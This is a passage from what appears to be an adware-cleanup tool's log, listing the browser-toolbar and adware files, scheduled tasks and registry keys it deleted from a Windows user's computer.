[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nortonsafe.search.ask.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_omni-cdn.getwebcake.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_omni-cdn.getwebcake.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pricegong.conduitapps.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_pricegong.conduitapps.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.conduit.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.conduit.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.searchcompletion.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.searchcompletion.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.tb.ask.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_search.tb.ask.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_storage.conduit.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_storage.conduit.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www-cdn.getwebcake.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www-cdn.getwebcake.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.ask.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.ask.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.getwebcake.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.getwebcake.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.search.ask.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.search.ask.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.shopathome.com_0.localstorage
[-] File Deleted : C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.shopathome.com_0.localstorage-journal
[-] File Deleted : C:\Users\Ken Terry\AppData\LocalLow\SkwConfig.bin
[-] File Deleted : C:\Users\Ken Terry\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Video Converter.lnk
[-] File Deleted : C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\WeatherBug®.lnk
[-] File Deleted : C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\user.js
[-] File Deleted : C:\Users\Ken Terry\Desktop\Video Converter.lnk
[-] File Deleted : C:\Users\Ken Terry\Desktop\WeatherBug®.lnk
[-] File Deleted : C:\Users\Public\Desktop\DriverFinder.lnk
[-] File Deleted : C:\Users\Public\Desktop\eBay.lnk
[-] File Deleted : C:\WINDOWS\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
[-] File Deleted : C:\WINDOWS\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb
[-] File Deleted : C:\WINDOWS\Sysnative\drivers\cherimoya.sys

***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

[-] Task Deleted : paretologic registration3
[-] Task Deleted : RunAsStdUser Task
[-] Task Deleted : TidyNetwork Update

***** [ Registry ] *****

[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\conduit.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\conduitapps.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\superfish.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www.superfish.com
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\Extension.DLL
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\GenericAskToolbar.DLL
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\WebCakeIEClient.DLL
[-] Key Deleted : HKLM\SOFTWARE\Classes\Extension.ExtensionHelperObject
[-] Key Deleted : HKLM\SOFTWARE\Classes\Extension.ExtensionHelperObject.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\iesmartbar.bandobjectattribute
[-] Key Deleted : HKLM\SOFTWARE\Classes\iesmartbar.bho
[-] Key Deleted : HKLM\SOFTWARE\Classes\iesmartbar.dockingpanel
[-] Key Deleted : HKLM\SOFTWARE\Classes\iesmartbar.iesmartbar
[-] Key Deleted : HKLM\SOFTWARE\Classes\iesmartbar.iesmartbarbandobject
[-] Key Deleted : HKLM\SOFTWARE\Classes\iesmartbar.smartbardisplaystate
[-] Key Deleted : HKLM\SOFTWARE\Classes\iesmartbar.smartbarmenuform
[-] Key Deleted : HKLM\SOFTWARE\CLASSES\Inbox.WS.com IE Toolbar
[-] Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
[-] Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\SWEETIE.IEToolbar
[-] Key Deleted : HKLM\SOFTWARE\Classes\SWEETIE.IEToolbar.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\sweetim_urlsearchhook.toolbarurlsearchhook
[-] Key Deleted : HKLM\SOFTWARE\Classes\sweetim_urlsearchhook.toolbarurlsearchhook.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.sweetie
[-] Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.sweetie.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\Updater.AmiUpd
[-] Key Deleted : HKLM\SOFTWARE\Classes\Updater.AmiUpd.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\WebCakeIEClient.Api
[-] Key Deleted : HKLM\SOFTWARE\Classes\WebCakeIEClient.Api.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\WebCakeIEClient.Layers
[-] Key Deleted : HKLM\SOFTWARE\Classes\WebCakeIEClient.Layers.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{2009AF2F-5786-3067-8799-B97F7832FDD6}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{425E7597-03A2-338D-B72A-0E51FFE77A7E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{915BB7D5-082E-3B91-B1E0-45B5FDE01F24}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{FB2E65F4-5687-33EF-9BBF-4E3C9C98D3B9}
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [TelevisionFanatic Browser Plugin Loader]
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IECT3309762
[-] Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3289847
[-] Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3298569
[-] Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3309762
[!] Value Not Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [TelevisionFanatic Browser Plugin Loader]
[-] Value Deleted : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{7D4F1959-3F72-49d5-8E59-F02F8AA6815D}]
[-] Key Deleted : HKCU\Software\Google\Chrome\Extensions\amfclgbdpgndipgoegfpkkgobahigbcl
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{7169BBB3-3289-4696-B35D-4A88BCF6FB12}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{9B0CB95C-933A-4B8C-B6D4-EDCD19A43874}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{B302A1BD-0157-49FA-90F1-4E94F22C7B4B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{FB684D26-01F4-4D9D-87CB-F486BEBA56DC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{00000000-6E41-4FD3-8538-502F5495E5FC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{31AD400D-1B06-4E33-A59A-90C2C140CBA0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{56561B2A-FB5D-363A-9631-4C03D6054209}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{67BD9EEB-AA06-4329-A940-D250019300C9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A0B10EBE-4E51-4CAE-949B-E6B9E7D68CEA}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A717364F-69F3-3A24-ADD5-3901A57F880E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AF6B0594-6008-4327-93E5-608AD710A6FA}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BB975E58-E769-4E5A-BA12-B765BC559FF3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CCB08265-B35D-30B2-A6AF-6986CA957358}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CD92622E-49B9-33B7-98D1-EC51049457D7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DF84E609-C3A4-49CB-A160-61767DAF8899}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E041E037-FA4B-364A-B440-7A1051EA0301}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EEE6C35B-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EEE6C35C-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EEE6C35D-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F02C0832-C85C-4B93-8C6F-9DF20121A10D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F511AFDB-726E-4458-90E7-1ECB97406544}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{FB684D26-01F4-4D9D-87CB-F486BEBA56DC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{81017EA9-9AA8-4A6A-9734-7AF40E7D593F}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{FDAD4DA1-61A2-4FD8-9C17-86F7AC245081}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0AFD55C8-ADF8-4A33-A6E1-DEDB7A36AEB4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6C434537-053E-486D-B62A-160059D9D456}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{91CF619A-4686-4CA4-9232-3B2E6B63AA92}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9EDC0C90-2B5B-4512-953E-35767BAD5C67}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A36867C6-302D-49FC-9D8E-1EB037B5F1AB}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{AC71B60E-94C9-4EDE-BA46-E146747BB67E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DF84E609-C3A4-49CB-A160-61767DAF8899}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E3ED53C5-7AD5-4DF5-9734-AFB6E7E5D9DB}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EEE6C358-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EEE6C359-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EEE6C35A-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E7F49ED-8C94-4AAA-A407-3010D099B11A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BB27DF2F-6F05-4A42-9FFD-14696D795750}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C00F4B2B-A33C-40FC-8E47-4D18DCD4B01E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9989BC14-9B5B-4B3B-8040-478FD1685E34}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{42CB7963-EFE0-4737-A927-CE076FAA3BA0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4B8E39FD-ED07-4A41-9681-3D78DAFCEE66}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{1D5A4199-956E-49BC-B89F-6A35C57C0D13}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A0EE0278-2986-4E5A-884E-A3BF0357E476}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{EEE6C35E-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{EEE6C35F-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{EFDF368C-8DD9-4E05-87CD-16AA5CB03CB8}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{026FD9BA-112B-4D9F-86EA-589E28016E8C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{03F59B4B-09D9-40F0-A01A-6E895023F2F0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{0597D3BE-9A4D-4426-A8A7-572AD299852E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{34979CB5-728D-4727-81BF-01850A3BB89B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{608F7340-E221-4AFB-A848-C4DAD297CD58}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{6784D08D-CDC3-419D-9B97-744A351ED908}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{73CADBBD-4DC5-419D-84F1-E7BF4C3B20C4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{952C6F00-CBA7-47BE-BAF3-CFC5808E6C7B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A378FD9D-B406-44BB-96D2-8CDAA668713F}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A3866408-A46D-4421-816F-F34D7247A046}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{AED3B1E0-FABB-4C27-A2DA-EC8352EE7E30}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{93F03FA6-C8F8-4850-B304-38ECC85ED3AB}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31AD400D-1B06-4E33-A59A-90C2C140CBA0}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EEE6C35C-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FDAD4DA1-61A2-4FD8-9C17-86F7AC245081}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{042DA63B-0933-403D-9395-B49307691690}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2A5A2A90-3B30-4E6E-A955-2F232C6EF517}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{31AD400D-1B06-4E33-A59A-90C2C140CBA0}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7736C7FA-512D-11E2-B871-DEC36088709B}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7D4F1959-3F72-49D5-8E59-F02F8AA6815D}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{8736C681-37A0-40C6-A0F0-4C083409151C}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CC99A798-FD3D-4AB4-969E-6071612524F9}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EEE6C35B-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EEE6C35C-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2FF49ED5-A3EF-410B-918E-97DECEB5996D}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FDAD4DA1-61A2-4FD8-9C17-86F7AC245081}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{2A5A2A90-3B30-4E6E-A955-2F232C6EF517}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{31AD400D-1B06-4E33-A59A-90C2C140CBA0}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{7736C7FA-512D-11E2-B871-DEC36088709B}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{7D4F1959-3F72-49D5-8E59-F02F8AA6815D}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D4027C7F-154A-4066-A1AD-4243D8127440}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EEE6C35B-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EEE6C35C-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FDAD4DA1-61A2-4FD8-9C17-86F7AC245081}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{AF6B0594-6008-4327-93E5-608AD710A6FA}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F02C0832-C85C-4B93-8C6F-9DF20121A10D}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{2FF49ED5-A3EF-410B-918E-97DECEB5996D}
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{6492E171-2427-4932-B414-33574A089F5E}]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35B-6118-11DC-9C72-001320C79847}]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35C-6118-11DC-9C72-001320C79847}]
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{612AD33D-9824-4E87-8396-92374E91C4BB}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{EEE6C367-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89CC5A31-B592-4BB3-82F5-BD8ACA3E0BF0}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{22714877-95E3-480E-A313-4EC440965E4F}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4E7F49ED-8C94-4AAA-A407-3010D099B11A}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{ECCA77AD-EF06-4650-B6FC-7A0E90687EB4}
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{AE07101B-46D4-4A98-AF68-0333EA26E113}]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{EEE6C35B-6118-11DC-9C72-001320C79847}]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
[-] Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{4B3803EA-5230-4DC3-A7FC-33638F3D3542}]
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{31AD400D-1B06-4E33-A59A-90C2C140CBA0}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{56561B2A-FB5D-363A-9631-4C03D6054209}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{A717364F-69F3-3A24-ADD5-3901A57F880E}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{CCB08265-B35D-30B2-A6AF-6986CA957358}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{CD92622E-49B9-33B7-98D1-EC51049457D7}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{E041E037-FA4B-364A-B440-7A1051EA0301}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0AFD55C8-ADF8-4A33-A6E1-DEDB7A36AEB4}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6C434537-053E-486D-B62A-160059D9D456}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{91CF619A-4686-4CA4-9232-3B2E6B63AA92}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9EDC0C90-2B5B-4512-953E-35767BAD5C67}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A36867C6-302D-49FC-9D8E-1EB037B5F1AB}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{AC71B60E-94C9-4EDE-BA46-E146747BB67E}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{DF84E609-C3A4-49CB-A160-61767DAF8899}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E3ED53C5-7AD5-4DF5-9734-AFB6E7E5D9DB}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EEE6C358-6118-11DC-9C72-001320C79847}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EEE6C359-6118-11DC-9C72-001320C79847}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EEE6C35A-6118-11DC-9C72-001320C79847}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E7F49ED-8C94-4AAA-A407-3010D099B11A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BB27DF2F-6F05-4A42-9FFD-14696D795750}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C00F4B2B-A33C-40FC-8E47-4D18DCD4B01E}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9989BC14-9B5B-4B3B-8040-478FD1685E34}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{42CB7963-EFE0-4737-A927-CE076FAA3BA0}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4B8E39FD-ED07-4A41-9681-3D78DAFCEE66}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31AD400D-1B06-4E33-A59A-90C2C140CBA0}
[-] Value Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{AE07101B-46D4-4A98-AF68-0333EA26E113}]
[-] Key Deleted : HKU\.DEFAULT\Software\AskPartnerNetwork
[-] Key Deleted : HKU\.DEFAULT\Software\IM
[-] Key Deleted : HKU\.DEFAULT\Software\ImInstaller
[-] Key Deleted : HKU\.DEFAULT\Software\SweetIM
[-] Key Deleted : HKU\.DEFAULT\Software\WNLT
[-] Key Deleted : HKCU\Software\APN PIP
[-] Key Deleted : HKCU\Software\APN
[-] Key Deleted : HKCU\Software\BackgroundContainer
[-] Key Deleted : HKCU\Software\Conduit
[-] Key Deleted : HKCU\Software\IM
[-] Key Deleted : HKCU\Software\ImInstaller
[-] Key Deleted : HKCU\Software\InstallCore
[-] Key Deleted : HKCU\Software\ParetoLogic
[-] Key Deleted : HKCU\Software\smartbarbackup
[-] Key Deleted : HKCU\Software\smartbarlog
[-] Key Deleted : HKCU\Software\Softonic
[-] Key Deleted : HKCU\Software\SweetIM
[-] Key Deleted : HKCU\Software\tuguu sl
